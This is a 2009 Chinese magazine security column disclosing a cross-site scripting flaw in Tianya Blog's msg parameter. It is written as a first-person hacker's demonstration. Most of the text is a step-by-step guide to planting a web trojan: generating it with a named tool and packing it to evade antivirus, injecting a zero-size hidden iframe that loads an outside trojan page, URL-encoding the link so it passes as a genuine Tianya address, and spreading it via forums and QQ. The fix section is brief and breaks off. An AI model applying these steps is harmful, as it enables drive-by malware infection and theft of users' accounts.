天涯此处 “毒”机四伏
安全阵线
本期主角:天涯博客
问题所在:msg参数过滤不严
主要危害:进行挂马攻击
调研时间:2009.7.4~2009.7.6
漏洞状况:已通知修复
占领天涯,曾经是某牛人的豪言壮语,不过基本上没有人相信他。其实,要渗透天涯,一个人就可以搞定,一个强大的黑客可以通过天涯博客的跨站漏洞,“曲线”占领天涯,剑指广大网民的个人隐私。
我的名字叫赵丰年,“丰年”二字取自“瑞雪兆丰年”, 寓意平安、富裕。虽然我只有17岁,但因一些机缘巧合,黑客生涯已有5年,跟不少顶级的黑客组织或者安全公司都有联系。一次偶遇相识了“吹雪居士”(说的就是小编我^_^),成为与《电脑报》结缘的第67名黑客。
最近,我在天涯博客上注册的时候(图1),无意中发现了一个跨站漏洞,网站没有对参数进行严格的过滤,导致可以通过跨站漏洞进行挂马。天涯的链接谁又会多疑呢?激活了网页木马,谁敢保证自己的QQ、网游等账号和密码肯定不会被盗?
我崇尚的是一个人的战争,在战争中回味黑客艺术,而不是品尝拥有金钱的味道,所以我不会把天涯博客上的这个跨站漏洞拿去卖钱——虽然可以卖个好价钱。下面,大家跟随我一起观看我的黑客艺术吧!
msg参数过滤不严
在天涯博客页面中,提供了信息提示功能。例如你要找某个博客或是某篇文章,如果不存在,就会弹出信息提示。与信息提示功能相关的是msg,如果msg的参数可以随意修改,就表示此处没有进行危险字符的过滤。
在浏览器中输入http://blog.tianya.cn/newblog/noticepage.asp?msg=,回车后弹出了一个对话框,内容为“test”(图2)。可以看出,天涯博客的确存在跨站漏洞。
安全小百科:跨站漏洞就如同一个商场中没有保安和管理人员,在这样一个缺乏有效监管和审查的商场中,自然会有冒充商场人员的骗子混进来摆摊设点,而消费者则会将这些骗子误认为是商场的内部员工,即便上当也认为自己是被商场骗了,而非外来的骗子骗了,因此对网站的安全和信任,还是能够构成相当大的威胁的。
将msg参数后的<script>alert(“text”)</script>修改为“<iframe src=“http://www.baidu.com” width=900 height=1200></iframe>”,回车后我们在天涯博客的页面中看到了百度的搜索框(图3)。这说明我们成功将百度页面插入了天涯博客页面中,如果把百度的网址换成网页木马的地址,就是所谓的挂马了。
在天涯博客模拟挂马
第一步:要在天涯博客上挂马,先要准备好网页木马。生成网页木马的工具有很多,不同黑客的选择不同。这里我们选择《突破XP+SP2网页木马生成器》(图4),运行程序后,点击“选择木马”后面的“浏览”,选择一个木马,然后点击“生成目录”后面的“浏览”,选择网页生成的地方。
再点击“确定”按钮,网页木马就生成了。此前选择的木马,黑客会进行免杀以增加木马的存活几率。免杀的方法有加壳、加花等,最后,将生成的网页木马上传到事先准备的空间里面,这样跨站挂马的前期准备工作就完成了。
第二步:构建挂马网址。修改msg后面的参数,添加网页木马的地址,完成挂马网址的构建。挂马网址如下所示:http://blog.tianya.cn/newblog/noticepage.asp?msg=
地址中的“width”表示挂马网页的宽度,“height”表示挂马网页的高度,将它们的值都修改为0,这样网页木马就可以悄悄地打开,不会被用户发觉,大大增强了挂马的隐蔽性。
第三步:现在的挂马网址,明眼人一看就知道嵌套了其他网页,就算打着天涯的名头也不容易骗到人。黑客是非常狡猾的,他们会对挂马网址进行加密。打开在线URL解码编码网站http://www.haokucn.com/haocoolfj/onlinetools/aspcodetools/URLCode/URLDecoding.asp,在文本框中输入noticepage.asp?msg=<iframe%20src=“http://www.11774.com/daodao.htm”%20width=0%20height=0></iframe>(图5)。点击“转换”按钮,得到
加密的地址(图6)。
第四步:挂马网址经过加密后,变成了图7中的网址。一般的人,看到这个网址只会认为它是属于天涯的,而想不到它是用来挂马的。最后黑客会利用各种途径传播挂马网址,例如通过论坛、QQ等流量较大的地方,如果真的有黑客这样做了,后果就不堪设想了。
安全小百科:在发送挂马网址之前需要将网址中的空格替换为%20,否则在发送过程中可能会出现超链接不完整的情况。
漏洞解决方案
天涯博客要堵上这个漏洞,需要在网站程序中对msg后的参数进行严格的关键字过滤,禁止用户查询